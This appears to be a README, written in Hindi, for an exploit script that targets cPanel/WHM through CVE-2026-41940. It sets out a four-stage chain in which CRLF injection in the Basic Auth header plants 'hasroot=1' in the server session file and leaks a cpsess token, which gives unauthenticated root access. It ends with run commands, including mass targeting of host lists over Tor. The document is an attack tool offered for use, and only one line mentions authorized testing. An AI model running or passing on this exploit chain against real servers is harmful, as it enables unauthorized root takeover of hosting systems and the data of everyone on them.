
cPanel/WHM CVE-2026-41940 CRLF इंजेक्शन प्रमाणीकरण बायपास एक्सप्लॉइट
cPanel/WHM सुरक्षा परीक्षण टूलकिट। CVE-2026-41940 CRLF इंजेक्शन प्रमाणीकरण बायपास और पोस्ट-एक्सप्लॉइटेशन विशेषाधिकार पिवोटिंग लागू करता है।
| स्क्रिप्ट | उद्देश्य |
|---|---|
cpanel_exploit.py | CVE-2026-41940: CRLF इंजेक्शन → WHM प्रमाणीकरण बायपास → रूट एक्सेस |
प्रकार: CRLF इंजेक्शन → प्रमाणीकरण बायपास → रूट RCE
प्रभावित: cPanel/WHM < पैच किए गए संस्करण
हमला: Basic Auth हेडर में प्री-ऑथ CRLF इंजेक्शन सर्वर-साइड सत्र फ़ाइल में इंजेक्ट करता है, एक अनप्रमाणित सत्र को WHM रूट तक उन्नत करता है।
hasroot=1Stage 1: POST /login/?login_only=1 → प्री-ऑथ सत्र मिंट करता है
Stage 2: GET / Authorization:Basic <CRLF> → hasroot=1 इंजेक्ट करता है, cpsess टोकन लीक करता है
Stage 3: GET /scripts2/listaccts → सत्र-कैश प्रसार गैजेट फायर करता है
Stage 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + संस्करण = रूट एक्सेस
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # केवल CRLF जांच, कोई विशेषाधिकार-वृद्धि नहीं
केवल अधिकृत पैठ परीक्षण के लिए।